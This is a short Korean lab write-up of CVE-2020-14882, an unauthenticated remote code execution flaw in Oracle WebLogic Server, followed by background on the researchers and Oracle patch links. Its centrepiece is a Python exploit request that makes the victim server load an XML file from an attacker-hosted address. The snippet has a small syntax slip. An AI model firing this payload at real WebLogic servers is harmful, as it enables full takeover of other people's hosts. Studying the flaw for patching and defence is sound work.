
Oracle WebLogic Server 탈취
CVE-2020-14882는 Oracle WebLogic Server의 Console 구성 요소에 있는 원격 코드 실행(RCE) 취약점입니다. 이 인증 전 취약점은 공격 복잡도가 '낮음'으로 평가되었으며 Oracle에 의해 '쉽게 악용 가능'한 것으로 강조되어 CVSSv3 점수 9.8의 심각도 등급을 받았습니다. 성공적으로 악용될 경우, 인증되지 않은 공격자가 HTTP를 통해 Oracle WebLogic 서버를 손상시키고 호스트에 대한 완전한 제어권을 얻을 수 있습니다. (자세히 보기 - Tenable)
영향을 받는 지원 버전은 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 및 14.1.1.0.0입니다.
피해자 (WebLogic Server): 192.168.0.15 - Windows 10 PRO에서 WebLogic Server 실행 중.
공격자 (호스팅된 XML 파일): 192.168.0.16 - Kali Linux - GNU/Linux - Debian.
페이로드:
import requests
url = http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
'?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' \
'(%22http://192.168.0.16:8000/Documents/teste.xml%22)'.format('192.168.0.15', '7001')
response = requests.get(url)
이 페이로드는 spring framework XML 라이브러리를 호출하여 공격자 도메인의 서버에 요청을 보내 teste.xml 파일을 찾습니다.
10월 28일, Jang이라는 보안 연구원이 CVE-2020-14882에 관한 블로그 게시물(베트남어)을 게시했으며, PoC에 사용할 수 있는 일부 세부 정보를 포함했습니다. Jang은 WebLogic 취약점에 대해 잘 알려진 인물로, CVE-2020-2555를 발견하여 Oracle에 보고한 공로를 인정받았으며, Oracle은 2020년 1월 CPU에서 해당 취약점을 패치했습니다. 3월에 Jang은 CVE-2020-2555가 완전히 수정되지 않았음을 확인했습니다. CVE-2020-2555의 우회 방법은 VNPT 정보보안 센터(ISC)의 Quynh Le라는 또 다른 연구원이 공개했습니다. Le와 Jang 모두 이 우회 방법을 보고한 공로를 인정받았으며, 이는 CVE-2020-2883으로 식별됩니다. (자세히 보기 - Tenable)
Oracle WebLogic: CVE-2020-14882 : Critical Patch Update (문서 ID 2771503.1). (Oracle 지원)
Oracle Critical Patch Update Advisory - 2020년 10월. (Oracle 지원)
CVE-2020-14882 Weblogic의 영향을 완화하는 방법. (Oracle 지원)
Oracle Fusion Middleware의 Oracle WebLogic Server 제품에 존재하는 취약점. (Mitre - CVE)